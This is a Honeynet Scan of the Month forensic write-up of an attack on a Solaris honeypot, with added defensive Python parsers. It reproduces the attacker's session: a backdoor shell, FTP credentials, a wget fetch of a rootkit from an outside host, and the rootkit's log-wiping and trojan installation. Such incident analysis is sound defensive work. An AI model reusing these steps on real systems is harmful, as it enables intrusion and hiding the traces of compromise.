Honeynet Scan of the Month 28
Submitter: Matthijs R. Koot (koot at cyberwar.nl)
Date: May 13, 2003
URL: http://www.honeynet.org/scans/scan28/
Rcpt: sotm at honeynet.org
Members of the AT&T Mexico Honeynet captured a unique attack. As is common, what is interesting is not how the attackers broke in, but what they did afterwards. Your mission is to analyze the network capture of the attacker's activity and decode the attacker's actions. There are two binary log files: Day1 captured the break-in, Day3 captures some unique activity following the compromise. The honeypot in question is IP 192.168.100.28. Make sure you review the challenge criteria before submitting your writeup.
day1.log.gz
MD5 (day1.log.gz) = 79e5871791542c8f38dd9cee2b2bc317
day3.log.gz
MD5 (day3.log.gz) = af8ab95f41530fe3561b506b422ed636
First, I downloaded both files:
$wget http://www.honeynet.org/scans/scan28/day1.log.gz
$wget http://www.honeynet.org/scans/scan28/day3.log.gz
Second, I verified the MD5 checksums (on FreeBSD, md5 is used to verify the checksums; on Linux you would use md5sum):
$md5 day1.log.gz
MD5 (day1.log.gz) = 8d5ea7e8dadfc1c990b7901b2cbffb41
$md5 day3.log.gz
MD5 (day3.log.gz) = af8ab95f41530fe3561b506b422ed636
...I unpacked the gzipped logs:
$gunzip day1.log.gz day3.log.gz
...I opened both binary logs in Ethereal to start analyzing the traffic.
The honeypot responded to "uname -a" with the following output, which shows it ran SunOS 5.8 (Solaris 8) on SPARC:
SunOS zoberius 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10
I got this result by coincidence while manually investigating the logged traffic in Ethereal.
The attacker exploited dtspcd on 6112/TCP and used the resulting ingreslock backdoor shell (served by an inetd instance, PID 1773, started with /tmp/x as its configuration file, as the "ps -fed | grep ' -s /tmp/x'" line in the payload below shows) to download several tools and a rootkit.
62.219.90.180 - the attacker
62.211.66.16 - XOOM FTP server used by the attacker to store exploits
62.211.66.53 - XOOM web server used by the attacker to store a rootkit
(192.168.100.28 - the compromised honeypot)
How the systems were used: see #4.
I don't have any software available at this time to create a diagram, so I'm settling for a chronological approach.
At 17:36:25, remote host 62.219.90.180 queries 6112/TCP (dtspcd).
At 17:36:26, the host sends a payload that successfully exploits it.
Result of the payload, reassembled:
#uname -a;
SunOS zoberius 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10.
#ls -l /core /var/dt/tmp/DTSPCD.log;
/core: No such file or directory.
/var/dt/tmp/DTSPCD.log: No such file or directory.
#PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;
#export PATH;
#echo "BD PID(s): "`ps -fed|grep ' -s /tmp/x'|grep -v grep|awk '{print $2}'`.
BD PID(s): 1773.
At 17:42:42, the attacker uses the ingreslock backdoor shell to open an FTP session to 62.211.66.16, a server of the free hosting provider XOOM:
220 services FTP server (Version XOOM FTP 1.24.3+local-release Fri Aug 28 15:52:40 PDT 1998) ready.
The attacker logs in with username "bobzz" and password "joka" and successfully downloads some files to the compromised honeypot:
At 17:45:13, about 2-3 minutes later, the attacker disconnects the honeynet from the FTP server.
#chmod +x solbnc wget dlp
#./wget
wget: missing URL
Usage: wget [OPTION]... [URL]...
Try `wget --help' for more options.
#./wget http://62.211.66.53/bobzz/sol.tar.gz
At 17:52:40, about 7 seconds after the first attempt to download the rootkit, a second attempt is made.
#rrrrrretar -xf sol.tar.gz
rrrrrretar: not found
#cd sol
sol: does not exist
#./setup
./setup: not found
#cd sol
sol: does not exist
#tar -xf sol.tar.gz
#cd sol
#./setup
bobz oN ircNet on join #priv.
[ASCII-art banner: Autor: bobz]
...:::[ Autore bobz ]:::...
...:::[ On IRcnEt On Join #bobz ]:::...
Ti:AmO:RosariA
Delete Logz
-------
Deleting /var/log...
/var/log/secure: No such file or directory
/var/log/secure.1: No such file or directory
/var/log/secure.2: No such file or directory
/var/log/secure.3: No such file or directory
/var/log/secure.4: No such file or directory
/var/log/boot.log: No such file or directory
/var/log/boot.log.1: No such file or directory
/var/log/boot.log.2: No such file or directory
/var/log/boot.log.3: No such file or directory
/var/log/boot.log.4: No such file or directory
/var/log/cron: No such file or directory
/var/log/cron.1: No such file or directory
/var/log/cron.2: No such file or directory
/var/log/cron.3: No such file or directory
/var/log/cron.4: No such file or directory
/var/log/lastlog: No such file or directory
/var/log/xferlog: No such file or directory
/var/log/xferlog.1: No such file or directory
/var/log/xferlog.2: No such file or directory
/var/log/xferlog.3: No such file or directory
/var/log/xferlog.4: No such file or directory
/var/log/wtmp: No such file or directory
/var/log/wtmp.1: No such file or directory
/var/log/spooler: No such file or directory
/var/log/spooler.1: No such file or directory
/var/log/spooler.2: No such file or directory
/var/log/spooler.3: No such file or directory
/var/log/spooler.4: No such file or directory
--- LogZ Cancellati...
Delete LogZ by warning
* Starting up at: 1038585350
* Installing from /usr/share/man/man1/.old/sol - Will erase /usr/share/man/man1/.old/sol after install
* Checking for existing rootkits...
*. Checking for existing rootkits...
*. checking /etc/rc2 and /etc/rc3 for rootkits...
*. Rootkits Removed from config files
*. checking crond configs for rootkits...
*. Rootkits Removed from crond config files
*** WARNING ***
2 suspicious files found in /dev
*** Insert Rootkit Password : mixer
*** Using Password mixer
*** Insert Rootkit SSH Port : 5001
*** Using Port 5001
*** Insert Rootkit PsyBNC Port : 7000
*** Using Port 7000
File processed...
* Making backups... su ping du passwd find ls netstat strings ps Done.
* Installing trojans... login sshd netstat ls find strings du passwd ping su Complete.
* Suid removal at atq atrm eject fdformat rdist rdist admintool ufsdump ufsrestore quota ff core lpset lpstat netpr arp chkperm Complete.
* Starting Patcher....
* Patching.... DTSCD PATCHED. LPD PATCHED. fingerd.
<28>Nov 29 09:56:18 inetd[167]: [ID 858011 daemon.warning] /usr/dt/bin/rpc.cmsd: Killed
cmsd.
<28>Nov 29 09:56:18 inetd[167]: [ID 858011 daemon.warning] /usr/sbin/sadmind: Killed
ttdbserverd. sadmind. statd. rquotad. rusersd. cachefsd.
<27>Nov 29 09:56:19 inetd[1773]: [ID 801587 daemon.error] /tmp/x: No such file or directory
bindshells. snmpXdmid. Done...
Now that the rootkit is in place, he downloads two patches for the system to make sure nobody else can hijack the compromised system away from him:
ftp://sunsolve.sun.com:21/pub/patches/111085-02.zip
ftp://sunsolve.sun.com:21/pub/patches/108949-07.zip
He patches the system and installs solbnc, a psyBNC build (solbnc stands for SOLaris BNC; a BNC is basically an IRC proxy used to stay anonymous on IRC).
On day 3, the attacker applied another patch:
ftp://sunsolve.sun.com:21/pub/patches/111085-02.zip
My best guess is that these ICMP packets are part of a DDoS setup: Stacheldraht is known to use "skillz" and "ficken" in the ICMP data field. However, a property of Stacheldraht is that it uses special, hardcoded IDs such as 666, and that is not the case in this SotM. If DDoS is indeed involved, it may be a Stacheldraht derivative.
The honeypot does not receive any pings, it only sends ping replies; the compromised system therefore might act as an agent, beaconing home (to nocfftl.etel.hu and 61.134.3.11).
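The check described above, written out as an added example (my code, not part of the original submission): it walks raw IPv4/ICMP packets, records every echo request sent to the honeypot, and flags echo replies from the honeypot that answer no earlier request or that carry one of the agent strings mentioned. The packets are constructed inline with build_icmp(); 10.0.0.5 is a made-up peer and 61.134.3.11 is one of the "home" hosts named above.

```python
import struct

# Constructed sample traffic (not taken from the SotM capture): minimal IPv4+ICMP
# packets built with build_icmp(). 61.134.3.11 is one of the two "home" hosts the
# write-up names; 10.0.0.5 is a made-up host that sends a normal ping.
HONEYPOT = "192.168.100.28"
AGENT_MARKERS = (b"skillz", b"ficken")   # payload strings the write-up attributes to Stacheldraht

def build_icmp(src, dst, icmp_type, ident, seq, payload):
    """Minimal IPv4 header + ICMP echo (8) / echo-reply (0); checksums left zero, parsing ignores them."""
    icmp = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0,
                     bytes(int(o) for o in src.split(".")), bytes(int(o) for o in dst.split(".")))
    return ip + icmp

def parse_icmp(pkt):
    """Return the fields we need from a raw IPv4 packet, or None if it is not ICMP."""
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != 1:
        return None
    src = ".".join(str(b) for b in pkt[12:16])
    dst = ".".join(str(b) for b in pkt[16:20])
    icmp_type, _code, _csum, ident, seq = struct.unpack("!BBHHH", pkt[ihl:ihl + 8])
    return {"src": src, "dst": dst, "type": icmp_type, "id": ident, "seq": seq, "data": pkt[ihl + 8:]}

def find_unsolicited_replies(packets, host):
    """Flag echo replies sent by `host` that answer no earlier request, or that carry an agent marker.
    Returns (peer, icmp_id, markers) per finding; markers is [] when the reply is merely unsolicited."""
    requests_seen = set()
    findings = []
    for raw in packets:
        p = parse_icmp(raw)
        if p is None:
            continue
        if p["type"] == 8 and p["dst"] == host:            # someone pinged the host
            requests_seen.add((p["src"], p["id"], p["seq"]))
        elif p["type"] == 0 and p["src"] == host:          # the host "answered"
            markers = [m.decode() for m in AGENT_MARKERS if m in p["data"]]
            if (p["dst"], p["id"], p["seq"]) not in requests_seen or markers:
                findings.append((p["dst"], p["id"], markers))
    return findings

SAMPLE = [
    build_icmp("10.0.0.5", HONEYPOT, 8, 0x1234, 1, b"abcdefgh"),       # normal ping in ...
    build_icmp(HONEYPOT, "10.0.0.5", 0, 0x1234, 1, b"abcdefgh"),       # ... and its legitimate reply
    build_icmp(HONEYPOT, "61.134.3.11", 0, 1000, 0, b"skillz\x00"),   # reply nobody asked for, agent marker
    build_icmp(HONEYPOT, "61.134.3.11", 0, 1000, 0, b"ficken\x00"),
    build_icmp(HONEYPOT, "61.134.3.11", 0, 2000, 0, b"hello"),        # unsolicited, no marker
]
```

Running find_unsolicited_replies(SAMPLE, HONEYPOT) on a real capture would take the packet list from a pcap reader instead of SAMPLE; the legitimate reply is not reported, the three others are.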
At 01:11:10 on day 3 the attacker enabled IPv6. This may be seen as rather unusual, although IPv6 can coexist with IPv4 on the same network. Several ICMPv6 packets were sent, all with the Type field set to 131 (Group Membership Report). In addition, TCP communication took place over IPv6 to 163.162.170.173 on ports 6667/TCP and 113/TCP (the usual IRC port and the ident lookup IRC servers perform), which looks like even more IRC: it was used to connect to an IRC server of a large Italian ISP, irc6.edisontel.it.
USER ahaa ahaa 127.0.0.1 :-:OwnZ:-
NICK `OwnZ``
:irc6.edisontel.it 001 `OwnZ`` :Welcome to the Internet Relay Network `OwnZ``!~ahaa@bacardi.orange.org.ru
:irc6.edisontel.it 002 `OwnZ`` :Your host is irc6.edisontel.it, running version 2.10.3p3+hemp
:irc6.edisontel.it 003 `OwnZ`` :This server was created Thu Jul 4 2002 at 20:02:20 CEST
:irc6.edisontel.it 004 `OwnZ`` irc6.edisontel.it 2.10.3p3+hemp aoOirw abeiIklmnoOpqrstv
:irc6.edisontel.it 005 `OwnZ`` MAP PREFIX=(ov)@+ MODES=3 CHANTYPES=#&!+ MAXCHANNELS=20 NICKLEN=9 TOPICLEN=160 KICKLEN=160 NETWORK=IRCNet CHANMODES=beI,k,l,imnpsaqr :are supported by this server
:irc6.edisontel.it 251 `OwnZ`` :There are 104308 users and 6 services on 46 servers
:irc6.edisontel.it 252 `OwnZ`` 180 :operators online
:irc6.edisontel.it 253 `OwnZ`` 3 :unknown connections
:irc6.edisontel.it 254 `OwnZ`` 51164 :channels formed
:irc6.edisontel.it 255 `OwnZ`` :I have 739 users, 0 services and 1 servers
:irc6.edisontel.it 265 `OwnZ`` :Current local users: 739 Max: 1163
:irc6.edisontel.it 266 `OwnZ`` :Current global users: 104308 Max: 125806
MODE `OwnZ`` +i
:irc6.edisontel.it 001 `OwnZ`` :Welcome to the Internet Relay Network `OwnZ``!~ahaa@host222-14.pool80117.interbusiness.it
:irc6.edisontel.it 375 `OwnZ`` :- irc6.edisontel.it Message of the Day -
:irc6.edisontel.it 372 `OwnZ`` :- 6/8/2002 17:20
:irc6.edisontel.it 372 `OwnZ`` :-
:irc6.edisontel.it 372 `OwnZ`` :- Welcome on...
:irc6.edisontel.it 372 `OwnZ`` :-
:irc6.edisontel.it 372 `OwnZ`` :- [ASCII-art banner, 5 lines]
:irc6.edisontel.it 372 `OwnZ`` :-
:irc6.edisontel.it 372 `OwnZ`` :- - IPv6 I-lines are only for italian pTLA.
:irc6.edisontel.it 372 `OwnZ`` :- We do not discuss I-lines for pTLA other than *.it
:irc6.edisontel.it 372 `OwnZ`` :-
:irc6.edisontel.it 372 `OwnZ`` :- - Port 6665 to 6669 are listening for clients.
:irc6.edisontel.it 372 `OwnZ`` :-
:irc6.edisontel.it 372 `OwnZ`` :- - IRC is mean for peaceful communication in respect
:irc6.edisontel.it 372 `OwnZ`` :
SETAWAY -OwnZ-
:irc6.edisontel.it 002 `OwnZ`` :Your host is irc6.edisontel.it, running version 2.10.3p3+hemp
:irc6.edisontel.it 003 `OwnZ`` :This server was created Thu Jul 4 2002 at 20:02:20 CEST
:irc6.edisontel.it 004 `OwnZ`` irc6.edisontel.it 2.10.3p3+hemp aoOirw abeiIklmnoOpqrstv
:irc6.edisontel.it 005 `OwnZ`` MAP PREFIX=(ov)@+ MODES=3 CHANTYPES=#&!+ MAXCHANNELS=20 NICKLEN=9 TOPICLEN=160 KICKLEN=160 NETWORK=IRCNet CHANMODES=beI,k,l,imnpsaqr :are supported by this server
:irc6.edisontel.it 251 `OwnZ`` :There are 104308 users and 6 services on 46 servers
:irc6.edisontel.it 252 `OwnZ`` 180 :operators online
:irc6.edisontel.it 253 `OwnZ`` 3 :unknown connections
:irc6.edisontel.it 254 `OwnZ`` 51164 :channels formed
:irc6.edisontel.it 255 `OwnZ`` :I have 739 users, 0 services and 1 servers
:irc6.edisontel.it 265 `OwnZ`` :Current local users: 739 Max: 1163
:irc6.edisontel.it 266 `OwnZ`` :Current global users: 104308 Max: 125806
:-psyBNC!psyBNC@lam3rz.de PRIVMSG `OwnZ`` :AWAY changed to '-OwnZ-'...
- and understanding of the other people and cultures...
:irc6.edisontel.it 372 `OwnZ`` :- Please remember that all the time and have fun.
:irc6.edisontel.it 372 `OwnZ`` :-
:irc6.edisontel.it 372 (...)
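To pull the identity facts out of a capture like the one above without reading it by hand, here is an added example (my code, not part of the original submission) that parses RFC 1459 messages and collects every nick!ident@host the server reports in a 001 welcome, the server version from 004, the network name from 005, and any non-server prefix that talks to the client. The sample lines are copied from the capture excerpt above (MOTD lines left out).

```python
import re

# Lines copied from the capture excerpt above (server irc6.edisontel.it); the MOTD
# lines are left out. Two different 001 welcomes arrive in what is captured as one
# session, which is consistent with a BNC (the psyBNC seen below) relaying the connection.
CAPTURE = """USER ahaa ahaa 127.0.0.1 :-:OwnZ:-
NICK `OwnZ``
:irc6.edisontel.it 001 `OwnZ`` :Welcome to the Internet Relay Network `OwnZ``!~ahaa@bacardi.orange.org.ru
:irc6.edisontel.it 004 `OwnZ`` irc6.edisontel.it 2.10.3p3+hemp aoOirw abeiIklmnoOpqrstv
:irc6.edisontel.it 005 `OwnZ`` MAP PREFIX=(ov)@+ MODES=3 CHANTYPES=#&!+ MAXCHANNELS=20 NICKLEN=9 TOPICLEN=160 KICKLEN=160 NETWORK=IRCNet CHANMODES=beI,k,l,imnpsaqr :are supported by this server
MODE `OwnZ`` +i
:irc6.edisontel.it 001 `OwnZ`` :Welcome to the Internet Relay Network `OwnZ``!~ahaa@host222-14.pool80117.interbusiness.it
:-psyBNC!psyBNC@lam3rz.de PRIVMSG `OwnZ`` :AWAY changed to '-OwnZ-'..."""

HOSTMASK = re.compile(r"(\S+)!(\S+)@(\S+)")

def parse_irc(line):
    """Split one RFC 1459 message into (prefix, command, params); the trailing
    parameter after ' :' may contain spaces and is kept whole."""
    prefix = None
    if line.startswith(":"):
        prefix, line = line[1:].split(" ", 1)
    if " :" in line:
        head, trailing = line.split(" :", 1)
        params = head.split() + [trailing]
    else:
        params = line.split()
    return prefix, params[0], params[1:]

def session_identities(text):
    """Pull the facts an analyst wants from a captured IRC session: every nick!ident@host
    the server reports in a 001 welcome, the server version (004), the network name
    (005 NETWORK=), and any non-server prefix that talks to the client (a BNC, for example)."""
    identities, info = [], {"bots": []}
    for line in text.splitlines():
        prefix, cmd, params = parse_irc(line)
        if cmd == "001":
            m = HOSTMASK.search(params[-1])
            if m:
                identities.append({"nick": m.group(1), "ident": m.group(2), "host": m.group(3)})
        elif cmd == "004":
            info["server"], info["version"] = params[1], params[2]
        elif cmd == "005":
            for token in params[1:-1]:
                if token.startswith("NETWORK="):
                    info["network"] = token[len("NETWORK="):]
        elif cmd == "PRIVMSG" and prefix and "!" in prefix:
            info["bots"].append(prefix)
    return identities, info
```

On the lines above, session_identities(CAPTURE) returns two identities with the same nick and ident but different hosts, which is the detail worth noting when deciding which host is the attacker's own and which is the bouncer.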
I think I was able to figure it out from the day1 packet dump. The exploit code ("ipv6sun") looks rather Italian: "Inserisci il tuo ipv4" (Italian for "enter your IPv4"). The attacker, who calls himself "bob", "bobz" or "bobbino", was connected through an Italian ISP while attacking the honeypot. On day 3, the attacker connects to an IRC server of an Italian ISP to perform some DDoS-related tasks and to chat, in Italian, with (among others) someone named "_-PaKi-_" and someone named "RiValD|n0". From all this I would say it is likely that the attacker is of Italian origin.
I'm a little short of time and this write-up isn't as thorough and detailed as it rightfully should be. However, these challenges are just too much fun :-)
I hope to do a better write-up for SotM29!
SotM28, Matthijs Koot